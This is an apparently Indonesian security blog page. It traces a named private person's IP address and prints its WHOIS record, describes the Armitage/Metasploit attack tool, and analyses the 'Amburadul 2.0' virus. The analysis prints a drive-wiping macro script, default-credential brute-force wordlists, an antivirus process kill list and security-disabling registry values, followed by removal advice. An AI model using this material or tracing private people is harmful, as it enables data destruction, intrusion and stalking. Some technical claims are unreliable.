berikut screenshot nya:



nomer satu adalah query ( masukkan dari encoding base64), nomer 2 adalah IP addres setelah saya tekan tombol decode.

dan IP addresnya adalah: ........................................

jreng , jreng , jreng , ....

125.161.178.92 ini adalah IP Addres dari komputer Reni Agustiani.

lalu kita melacak lokasinya:

masukkan IP Addresnya kedalam web ini ( mencari pakai satelit ):

http://www.ipaddresslocation.org/

berikut option pilihannya:





dan ini adalah hasil nya setelah saya menggunakan IP Locator:







atau, hasil lengkapnya:

_(( Hasil WHOIS ))_

[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 125.160.0.0 - 125.163.255.255
netname: TELKOMNET
descr: PT Telekomunikasi Indonesia
descr: Menara Multimedia Lt. 7
descr: Jl. Kebon Sirih No. 12
descr: JAKARTA - 10340
country: ID
admin-c: AN163-AP
tech-c: IS49-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-TELKOMNET
remarks: For SPAM or ABUSE case, send to abuse@telkom.net.id
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20050902
changed: hm-changed@apnic.net 20051223
source: APNIC

route: 125.161.176.0/20
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
country: ID
origin: AS7713
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20090319
source: APNIC

route: 125.161.128.0/18
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
country: ID
origin: AS7713
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20090319
source: APNIC

route: 125.161.0.0/16
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
country: ID
origin: AS7713
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20090319
source: APNIC

person: Adriansjah Nasution
nic-hdl: AN163-AP
e-mail: adriansjah@telkom.co.id
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebonsirih No.12
address: JAKARTA
phone: +62-21-3860500
fax-no: +62-21-3861215
country: ID
changed: yogo@telkom.co.id 20050802
mnt-by: MAINT-TELKOMNET
source: APNIC

person: Iskandar Satyogo Prasetyo
nic-hdl: IS49-AP
e-mail: yogo@telkom.co.id
address: PT. TELEKOMUNIKASI INDONESIA
address: MULTIMEDIA DIVISION
address: Jl. Kebonsirih No.12 7th floor
address: Jakarta Indonesia
phone: +62-21-3860500
fax-no: +62-21-3861215
country: ID
changed: m_untung@telkom.co.id 20040729
mnt-by: MAINT-TELKOMNET
source: APNIC

_(( e.n.d ))_

Read More »

1 Armitage - GUI Manajemen Attack Untuk Metasploit

Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda.

Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.

Untuk penemuan, Armitage mengekspos beberapa fitur-fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.

Armitage membantu dengan Remote Exploitation - menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.

Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.

Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse file, dan meluncurkan Command Shell.



Yang terkahir, Armitage membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan.

Untuk menggunakan Armitage, Anda memerlukan berikut ini:
* Linux atau Windows
* Java 1.6
* Metasploit Framework 3.5
* Database dikonfigurasi. Pastikan Anda tahu username, password, dan host.


Untuk Mendapatkan Armitage, Silahkan Download disini:
Windows – armitage112510.zip
Linux – armitage112510.tgz

--------------------------------------------------------------------------
Refrensi:
- http://www.fastandeasyhacking.com/manual
- http://www.darknet.org.uk/2010/12/ar...or-metasploit/
- http://www.commonexploits.com/
--------------------------------------------------------------------------

Read More »

0 P3K untuk VIRUS AMBURADUL versi 2.0 : Virus dengan Teknologi Hacking beragam Metode Modern

Amburadul.. begitulah kata yang terucap ketika seseorang terinfeksi virus yang berakibat fatal sampai user tak bisa makan, minum mapun tidur, gara2 semua data amburadul alias hilang entah bagaimana ceritanya, tiba-tiba "ntldr missing" ketika di PC dinyalakan. Virus ini tergolong virus akhir tahun yang berakibat fatal, yang sebelumnya versi 1.0 dari virus ini cukup menghebohkan dengan kritik 'bahasa inggris si pembuat virus ancur lebur', dalam versi 2.0 ini si pembuat mengunakan bahasa indonesia, mungkin belum sempat untuk kursus inggris.

Virus masih dalam keluarga VB & Delphi yang di pack mengunakan UPX / PE Lite dengan mengadopsi file .pif/.cmd/.bat sebagai tringger route dengan mengunakan MacroX dan mengunakan celah keamanan VNC (remote control) port 590X. Virus lokal amburadul mengunakan celah keamanan dari share folder dan network device dengan mengunakan metode ipc$, admin$, serta brute force untuk menjalankan aksinya, tiba-tiba data/settingan kembali ke semula (default), demikian file/folder yang tersharing, lenyap berserta dengan file2nya, sekaligus box linuxpun ikut dikerjai dengan beberapa exploit yang ada didalam tubuh virus.

Sampai akhir desember 2010 ini, Vaksincom mendapakan laporan lebih dari 210 pelapor dalam 1 bulan terakhir ketika virus diperkirakan menyebar lewat YM, E-mail serta situs2 jejaring social seperti facebook, twiiter dan linkedin, yang menutup tahun 2010 dengan "Virus of The Year". Diperkirakan pembuat berasal dari Semarang, Indonesia seorang mahasiswa yang juga tergabung dalam group hacker turki "iSKORPiTX" dengan nick "The Conflickzer", diketahui dari file trojan/backdoor dari badan file yang merupakan file pendukung untuk hacking dan beberapa exploit untuk mengexploitasi sistim operasi khususnya bagi penguna Linux.

Selain itu virus memiliki teknologi Multipolymorhpic yang merupakan file induk berupa karakter teracak dengan badan virus yang teracak juga, hal ini membuat sulit vendor antivirus untuk membuat antivirus yang tepat untuk virus ini. Selain itu virus mengunakan Macro Recording, dimana pada saat2 tertentu, mouse seakan2 berjalan sendiri dengan ketikan keyboard untuk menghapus seluruh file sistim/data pada komputer user. Ikuti perjalanan team Vaksincom membongkar virus Amburadul versi 2.0 ini.

1. Nama Virus : W32.Amburadul-2 alias Ambrol-II/PoisonIvy/DeadLock/MatroX/Brontx.EQ/D.ALL

2. Asal Pembuat : Semarang - Indonesia

3. Dibuat dengan : Batch File adopt dari file .pif, .cmd, bat mengunakan MacroX & AutoIt dengan kompresi UPX / PE Lite dan Backdoor / Trojan dibuat mengunakan bahasa pemograman VB & Delphi.

4. Efek : Vaksincom mencatat ada 10 efek nyata yang dilakukan oleh Virus Amburadul sesuai dengan tringger routine virus, seperti :

• Menghapus seluruh file offline pada drive Z s/d C secara berurutan, dengan memberi label volume "AMBURADUL" mengunakan batchfile/macrox (port 5900/vnc)
• Mengformat data drive Z s/d C (kecuali sistim) dengan menganti label selain drive C dengan "AMBURADUL" dengan metode yang sama (no. 1).
• Injeksi ke Internet Explorer dengan menambahkan System Down – hacked by iSKORPiTX (hacker turki yang memiliki backdoor / trojan celah keamanan pada rpc-windows.
• Mematikan fungsi antivirus dengan cara melakukan uninstall dan mematikan proses penjagaan (guarding) antivirus/firewall.
• Mengirimkan informasi typing horse ke iskorpitx@yahoo.com dan conflickzer@yahoo.com berupa update status virus dan info pc terinfeksi berupa key trapped.
• File induk terletak pada badan file sistim windows (svchost.exe, csrss.exe, alg.exe) yang digunakan oleh virus conficker dengan menyebabkan rpc hole berakibat jaringan down/looping.
• Mengunakan Macro Recording untuk menjalan aksi lewat remote VNC (port 5900), yang merupakan bug dari vnc versi 4 dengan membypass password default.
• Menginject jaringan dengan metode IPC$ pada bug sharing pada Windows dengan melakukan direktori network listing untuk menjalankan aksi menghapusan file/data.
• Mencoba untuk masuk ke sistim keamanan jaringan Windows / Linux dengan mencoba beberapa username dan password dengan metode bruteforcing. Dengan informasi user/password yang dicoba sbb :
  
  Username yang di gunakan :
  - admin
  - administrator
  - [namakomputer]
  - [namaworkgroup]
  - [namauser]
  - [namafilesharing]
  - [namadomain]
  - root
  - master
  - manager
  - system
  - sysadmin
  - sysop
  - SUPPORT_388945a0
  - ASPNET
  - HelpAssistant
  
  dengan password dala file wordlist :
  - admin
  - administrator
  - password
  - admin123
  - adm
  - 123456
  - 12345
  - 1234567
  - qwerty
  - root
  - [namakomputer]
  - [namaworkgroup]
  - [namauser]
  - [namafilesharing]
  - [namadomain]
  - *blank*
  - ..dll
  Dan mengunakan teknik Bruteforcing dengan mencoba karakter A-Z, a-z,
  0-9, !@#$%^&*()-{}\<> untuk menembus jaringan lokal mapun alat -
  alat device seperti print server, router, access point, fingerprint, pabx,
  wacom, cctv, dll.
  
• Membuat schduler pada Windows berupa tringger aktif dan Linux berupa crontab serta injeksi registry pada file.com, .exe, .pif, .lnk, .cmd, .txt, .jpg, dengan menambahkan explorer pada svchost.exe, userinit.exe dan winlogon.exe saat komputer di restart dan mematikan fungsi system restore dan windows/linux firewall.

5. Media Sebar : Flashdisk, e-mail (attachment/.lnk) dan Yahoo messenger.

6. Security Vuln : Merusak sistim kekebalan baik oleh Windows Firewall mapun aplikasi security seperti :

A2CMD, A2FREE A2GUARD A2SERVICE, ADVCHK, AGB, AHPROCMONSERVER, AIRDEFENSE, AKRNL, ALERTSVC, AMON, ANTIVIR APVXDWIN, ARMOR2NET, ASHAVAST, ASHDISP, ASHENHCD, ASHMAISV, ASHPOPWZ, ASHSERV, ASHSIMPL, ASHSKPCK, ASHWEBSV, ASWSCAN, ASWUPDSV, AVAST AVCENTER AVCIMAN, AVCONSOL, AVENGINE, AVESVC, AVEVAL, AVEVL32, AVGAM AVGCC, AVGCC32, AVGCHSVX, AVGCSRVX, AVGCTRL, AVGEMC, AVGFWSRV, AVGNSX, AVGNT, AVGNTMGR AVGSERV, AVGTRAY, AVGUARD, AVGUPSVC, AVGWDSVC, AVINITNT, AVIRA AVKSERV, AVKSERVICE, AVKWCTL, AVP, AVP32, AVPCC, AVPM, AVSCHED32, AVSERVER, AVSYNMGR, AVWUPD32, AVWUPSRV, AVXMONITOR AVXQUAR, AVZ, BDSWITCH, BITDEFENDER, BLACKD, BLACKICE, CAFIX, CCEVTMGR, CCSETMGR, CFIAUDIT, CFP, CFPCONFIG, CLAMTRAY, CLAMWIN, CUREIT, DEFENDERDAEMON, DEFWATCH, DRVIRUS, DRWADINS, DRWEB, DWEBIO, DWEBLLIO, EKRN, ESCANH95, ESCANHNT, EWIDOCTRL, EZANTIVIRUSREGISTRATIONCHECK, F-AGNT95, F-SCHED, F-STOPW, FAMEH32, FILEMON, FIREWALL FORTICLIENT, FORTISCAN, FORTITRAY, FPAVSERVER, FPROTTRAY, FPWIN, FRESHCLAM, FSAV32, FSAVGUI, FSBWSYS, FSDFWD, FSGK32, FSGK32ST, FSGUIEXE, FSMA32, FSMB32, FSPEX, FSSM32, GCASDTSERV, GCASSERV, GIANTANTISPYWARE, GUARDGUI, GUARDNT, GUARDXKICKOFF, GUARDXSERVICE, HREGMON, HRRES, HSOCKPE, HUPDATE, IAMAPP, IAMSERV, ICLOAD95, ICLOADNT, ICMON, ICSSUPPNT, ICSUPP95, ICSUPPNT, INETUPD, INOCIT, INORPC, INORT, INOTASK, INOUPTNG, IOMON98, IPTRAY, ISAFE, ISATRAY, KAV, KAVMM, KAVPF, KAVPFW, KAVSTART, KAVSVC, KAVSVCUI, KMAILMON, MAMUTU, MCAGENT, MCMNHDLR, MCREGWIZ, MCUPDATE, MCVSSHLD, MINILOG, MYAGTSVC, MYAGTTRY, NAVAPSVC, NAVAPW32, NAVLU32, NAVW32, NEOWATCHLOG, NEOWATCHTRAY, NISSERV NISUM, NMAIN, NOD32 NORMIST, NOTSTART, NPAVTRAY, NPFMNTOR, NPFMSG, NPROTECT, NSCHED32, NSMDTR, NSSSERV, NSSTRAY, NTOS, NTRTSCAN, NTXCONFIG, NUPGRADE, NVCOD, NVCTE, NVCUT, NWSERVICE, OFCPFWSVC, ONLINENT, OP_MON, OPSSVC, OUTPOST PAVFIRES, PAVFNSVR, PAVKRE, PAVPROT, PAVPROXY, PAVPRSRV, PAVSRV51, PAVSS, PCCGUIDE, PCCIOMON, PCCNTMON, PCCPFW, PCCTLCOM, PCTAV, PERSFW, PERTSK, PERVAC, PESTPATROL PNMSRV, PREVSRV, PREVX PSIMSVC, QHONLINE, QHONSVC, QHSET, QHWSCSVC, QUHLPSVC, RFWMAIN, RTVSCAN, RTVSCN95, SALITY SAPISSVC, SAVADMINSERVICE, SAVMAIN, SAVPROGRESS, SAVSCAN, SCANNINGPROCESS, SCANWSCS, SDHELP, SDRA64, SHSTAT, SITECLI, SPBBCSVC, SPHINX, SPIDERCPL, SPIDERML, SPIDERNT, SPIDERUI, SPYBOTSD, SPYXX, SS3EDIT, STOPSIGNAV, SWAGENT, SWDOCTOR, SWNETSUP, SYMLCSVC, SYMPROXYSVC, SYMSPORT, SYMWSC, SYNMGR, TAUMON, TBMON, TMLISTEN, TMNTSRV, TMPROXY, TNBUTIL, TRJSCAN, TROJAN, VBA32ECM, VBA32IFS, VBA32LDR, VBA32PP3, VBSNTW, VCRMON, VPTRAY, VRFWSVC, VRMONNT, VRMONSVC, VRRW32, VSECOMR, VSHWIN32, VSMON, VSSERV, VSSTAT, WATCHDOG, WEBSCANX, WINSSNOTIFY, WRCTRL, XCOMMSVR, ZLCLIENT, ZONEALARM

7. Modifikasi Reg : Selain menyembuyikan dari Task Manager / MsConfig, virus ini
mematikan beberapa fungsi windows dari registry seperti :


AntiVirusDisableNotify = 1
AntiVirusOverride = 1
FirewallDisableNotify = 1
FirewallOverride = 1
UacDisableNotify = 1
UpdatesDisableNotify = 1
Hidden = 2
EnableFirewall = 0

8. File Induk : Memiliki beberapa file induk :
- [fileacak].lnk // Shortcut untuk menjalankan Trojan / Backdoor
- [fileacak].pif // Trojan
- [fileacak].exe // Backdoor
- [fileacak].cmd // Script Otomatis Tringger Routine
- [fileacak].bat // Script Otomatis Tringger Routine

Terletak pada seluruh direktory file sharing maupun [drive]:\ [windir]\system32

[fileacak] = angka dan huruf dengan beberapa case menyamar sebagai svchost.exe, ctfmon.exe, alg.exe, dan csrss.exe.

9. AutoScript : Memiliki beberapa script berbahaya dengan mengunakan MacroX dengan
mengambungkan dengan port 5900 pada VNC server (bug vnc diissue dari
tahun 2003, dapat di lihat jelas pada :

http://www.realvnc.com/pipermail/vnc...ch/037830.html
http://www.securityspace.com/smysecu....html?id=10758

dengan Script Macro yang dijalankan sesuai dengan tringger routine :

<//Script:RunFirst.macro//>
MousePos=45,755
MouseButton=1,1
Activate=Start Menu
Text={UP 3}{ENTER}
Activate=Run
Text=cmd{ENTER}
Activate=Program Manager
Activate=C:\[windir]\system32\cmd.exe
Repeat=26
Drive=Drive+Chr$([Count+1])
Text=[drive]<Shift>ü</Shift>{ENTER}cd\{ENTER}
Text=rd /S /Q .{ENTER}
Until=0
Activate=C:\[windir]\system32\cmd.exe
Text=c<Shift>ü</Shift>{ENTER}cd\{ENTER}
Text=rd /S /Q .{ENTER}
Activate=C:\WINXP\system32\cmd.exe
Text=format /C /Q [drive]:{ENTER}
Text=Label [drive] AMBURADUL
Wait=183
Text=LABEL AMBURADULt{ENTER}
Activate=Exit
Memiliki beberapa Script Macro dengan keyboard mapun mouse untuk menjalakan aksi dengan menyusup melalui celah vnc / port 5900/5901/2

10. Solusi : Untuk mengatasi virus Amburadul versi 2.0 ini sebelumnya kami ingatkan
agar backup data/files senantiasa dan pergunakan username/password yang
tidak baku / standar, lakukan update antivirus secara berkala.

• Lakukan pemutusan terhadap jaringan/koneksi
• Disable [System Restore] selama proses pembersihan
• Matikan proses virus dengan mengunakan Process Explorer, cari beberapa file yang dicurigai seperti svchost.exe, ctfmon.exe, alg.exe dengan byte yang besar dan proses load processor yang tinggi serta beberapa file ext .tmp, .lnk, .sys, .drv dan file ext yang tidak standart.
• Agar tidak terinfeksi kembali lakukan pembatasan pada policy windows dengan cara :
  
  Caranya:
  -. Start -- Run ketik perintah SECPOL.MSC kemudian klik tombol [OK]
  -. Setelah muncul layar Local Security Settings, klik kanan pada menu Software Restriction Policies lalu klik Create New Policies
  -. Pada menu Software Restriction Policies, klik Additional Rules
  -. Klik kanan pada Additional Rules, kemudian pilih New Hash Rule, dan akan muncul layar New Hash Rule
  -. Pada kolom File hash klik tombol Browse, kemudian arahkan ke direktori [C:\Windows\system32\[fileacakvirus.exe] dan klik tombol [Open]
  -. Pada kolom Security level pilih [Disallowed]
  -. Pada kolom description boleh di isi atau dikosongkan saja
  -. Klik tombol [Apply] dan [Ok]
  
  Catatan: Jika komputer Anda tidak terinstall Windows XP Professional / 2003 Server 2000 Server / Vista / 2008 lewati langkah ini.
• Hapus string registry dengan mengunakan CureIt dan Repair dengan mengunakan TuneUp Utilities 2010
• Jika terinfeksi virus ini, user tidak dapat melakukan booting Windows dengan muncul pesan error NTLDR Is Missing, sebaiknya dilakukan Repiar atau Install ulang.
• Sementara untuk file yang telah di hapus, dapat direcovery mengunakan software Recovery seperti getDataBase / EasyRecovery / Recovery My Files dengan mengunakan type delete atau format recovery.
• Hapus seluruh file virus dengan mengunakan Kaspersky Virus Removal Tools 2010 yang dapat di download :
  http://support.kaspersky.com/viruses...ol2010?level=2
• Update patch security terbaru untuk celah port 5900, rpc, ipc$ melalui
  site microsoft : http://www.microsoft.com/downloads
• Backup Data Anda sekarang juga!!! dan update antivirus!!

Akhir kata penulis berpesan kepada seluruh pengunakan PC di Indonesia, agar membackup data senantiasa secara terperiodik, jangan hanya mengandalkan program security, firewall atau antivirus karena program tersebut selalu kalah selangkah oleh program2 penganggu seperti virus, backdoor, trojan, dll. Lakukan update patch khususnya operating sisitim Microsoft Family, juga Linux disarankan karena virus mulai beralih ke sistim keamanan Linux. Tak lupa Vaksincom mengucapkan Hari Natal 2010 dan Tahun Baru 2011, sampai bertemu pada artikel berikutnya dengan pembahasan yang lebih menarik. Adios Amigos.

Read More »